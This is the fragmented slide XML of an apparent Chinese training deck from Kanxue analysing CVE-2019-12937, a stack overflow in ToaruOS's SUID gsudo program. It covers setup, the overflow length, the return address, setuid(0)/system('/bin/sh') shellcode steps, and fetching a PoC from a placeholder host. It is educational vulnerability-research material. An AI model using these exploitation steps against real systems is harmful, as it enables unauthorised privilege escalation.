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0" r:id="rId4"/>
    <p:sldId id="257" r:id="rId5"/>
    <p:sldId id="265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7" r:id="rId21"/>
    <p:sldId id="285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2E"/>
    <a:srgbClr val="00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40" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr>
        <p:scale>
          <a:sx n="150" d="100"/>
          <a:sy n="150" d="100"/>
        </p:scale>
        <p:origin x="-893" y="-240"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="16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前言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zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>本</a:t>
            </a:r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系列课程名为《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linux</a:t>
            </a:r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平台漏洞分析、利用和挖掘》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zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>整个</a:t>
            </a:r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课程分两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</a:rPr>
              <a:t>部分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zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>第</a:t>
            </a:r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一部分以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linux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或者类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linux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</a:rPr>
              <a:t>平台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上的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</a:rPr>
              <a:t>实际</a:t>
            </a:r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漏洞为案例，介绍环境搭建、漏洞复现、漏洞分析和漏洞利用的整个过程。第二部分介绍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fuzzing</a:t>
            </a:r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工具的使用，通过实际的案例介绍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afl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-fuzz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libfuzz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honggfuzz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</a:rPr>
              <a:t>这</a:t>
            </a:r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三个比较流行的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fuzzing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>工具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面对人群：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、对漏洞分析、漏洞挖掘感兴趣，不知道怎么入门。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、刚刚入门，想学习更多案例的人群。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zh-CN" altLang="zh-CN" sz="1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调用链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gsudo.c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-&gt; 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yutani_init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-&gt; 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pex_connect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触发漏洞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pex_connect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函数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参数，从环境变量中</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
            </a:b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获取，可控。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a: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28988"/>
            <a:ext cx="3836144" cy="30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SUID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权限的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程序</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN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SUID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程序会创建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t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权限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，</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200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是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为了让一般用户在执行某些程序的时候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，</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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能够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暂时具有该程序拥有者的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权限。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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例如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</a:rPr>
              <a:t>sudo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</a:rPr>
              <a:t>su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。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需要密码。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47614"/>
            <a:ext cx="4961966" cy="136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SUID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权限的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程序</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN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SUID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程序会创建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t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权限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，</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200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是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为了让一般用户在执行某些程序的时候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，</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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能够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暂时具有该程序拥有者的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权限。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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例如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</a:rPr>
              <a:t>sudo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</a:rPr>
              <a:t>su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。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需要密码。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94532"/>
            <a:ext cx="5027672" cy="240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gsudo</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
            </a:b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ToaruOS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系统上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</a:rPr>
              <a:t>gsudo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就是有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SUID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权限的程序。在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</a:rPr>
              <a:t>gsudo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程序中出现的漏洞，可以用来提权。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" b="1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栈溢出</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
            </a:b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ToaruOS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中没有栈随机、堆随机、栈不可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执行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等等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，这些保护机制，利用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起来相对简单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但是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没有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gdb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一些调试工具，还是要费点心思。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79662"/>
            <a:ext cx="4408969" cy="158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栈溢出</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
            </a:b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、溢出的长度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2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、跳转的地址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3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、执行的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shellcode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栈溢出</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
            </a:b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、溢出的长度  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100+ebp+ret      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771550"/>
            <a:ext cx="3621607" cy="368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栈溢出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2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、跳转的地址                       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#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define EIP "\x0c\xc0\x01\x3f" </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
            </a:br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35646"/>
            <a:ext cx="4674304" cy="160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栈溢出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3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、执行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shellcode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首先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执行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setuid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(0)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设置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当前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进程权限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，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然后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执行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system(/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bin/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sh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返回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shell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T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oaruOS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通过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int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0x7f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调用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系统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函数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，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syscall_nums.h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中有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系统调用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号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，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setuid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对应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24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system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对应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7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br>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0"/>
            </a:b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                       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31590"/>
            <a:ext cx="5213201" cy="287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栈溢出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200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0"/>
            </a:b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                       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291" name="Picture 3" descr="https://shuoz.top/assets/img/toaruos-shell.9f8c335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074" y="1623240"/>
            <a:ext cx="5425852" cy="26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2211710"/>
            <a:ext cx="3591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800" dirty="0" smtClean="0">
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t> cve-2019-12937</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" b="1" spc="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b="1" spc="800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>ToaruOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1" spc="800" dirty="0" smtClean="0">
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>提</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1" spc="800" dirty="0">
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>权漏洞分析</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" b="1" spc="800" dirty="0">
              <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
              <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" b="1" spc="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2795141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200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00292E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>shuoz@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000" spc="200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00292E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>看雪学院</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1000" spc="200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0029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结尾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结束语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到此，我们简单的分析了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ToaruOS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gsudo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栈溢出漏洞的整个流程。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ToaruOS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比较简单，源码也少，很方便初学者，学习操作系统的各种知识，感兴趣的可以去试着读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ToaruOS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源码。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整个分析过程，如果有疑问或者错误的地方，请直接提出来，大家一起讨论，一起进步，谢谢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。</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0"/>
            </a:b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                       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自我介绍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shu0z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安全行业从业者</a:t>
            </a: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长期致力于</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US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linux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平台漏洞分析、挖掘工作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漏洞复现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漏洞分析</a:t>
            </a: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漏洞利用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软件介绍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ToaruOS</a:t>
            </a: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ToaruOS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是一套使用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语言编写的开源计算机操作系统，是一个由伊利诺伊大学计算机科学本科生开发的业余爱好操作系统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。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ToaruOS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可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POSIX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x86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架构上运行。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ToAruOS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的主要功能包括对进程和线程的支持、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ELF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二进制的支持、运行时加载模块、管道（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Pipe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）和各种类型的终端设备（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TTY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）的支持、虚拟文件系统的支持、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EXT2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文件系统的支持、信号量支持等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目录环境搭建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操作系统：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ubuntu16.04(64bit)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目标软件版本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ToaruOS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1.10.9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br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
            </a:b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编译安装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下载目标软件源码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https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://github.com/klange/toaruos/archive/v1.10.9.tar.gz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安装依赖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编译安装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m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ake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m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ake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run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sz="3300" b="1" noProof="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>运行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3300" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>poc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 下载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</a:rPr>
              <a:t>poc</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
            </a:b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fetch http://x.x.x.x:8000/poc.c &gt; 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</a:rPr>
              <a:t>poc.c</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="28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 编译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</a:rPr>
              <a:t>poc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="28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gcc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-o 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poc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</a:rPr>
              <a:t>poc.c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运行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</a:rPr>
              <a:t>poc</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3700" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3700" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>poc</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800" dirty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从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patch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" noProof="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>入手</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
            </a:b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52" y="1491630"/>
            <a:ext cx="6312567" cy="294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solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
        </a:ln>
      </a:spPr>
      <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0">
        <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
      </a:bodyPr>
      <a:lstStyle>
        <a:defPPr marL="0" marR="0" indent="0" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
          <a:lnSpc>
            <a:spcPct val="170000"/>
          </a:lnSpc>
          <a:spcBef>
            <a:spcPct val="20000"/>
          </a:spcBef>
          <a:spcAft>
            <a:spcPts val="0"/>
          </a:spcAft>
          <a:buClrTx/>
          <a:buSzTx/>
          <a:buFont typeface="Arial" panose="020B0604020202090204" pitchFamily="34" charset="0"/>
          <a:buNone/>
          <a:defRPr kumimoji="0" sz="18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n-ea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演示</Application>
  <PresentationFormat>全屏显示(16:9)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方正书宋_GBK</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>黑体</vt:lpstr>
      <vt:lpstr>汉仪中黑KW</vt:lpstr>
      <vt:lpstr>宋体</vt:lpstr>
      <vt:lpstr>汉仪书宋二KW</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Helvetica Neue</vt:lpstr>
      <vt:lpstr>微软雅黑</vt:lpstr>
      <vt:lpstr>汉仪旗黑KW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justfan</cp:lastModifiedBy>
  <cp:revision>228</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-09-13T11:28:14Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-09-13T11:28:14Z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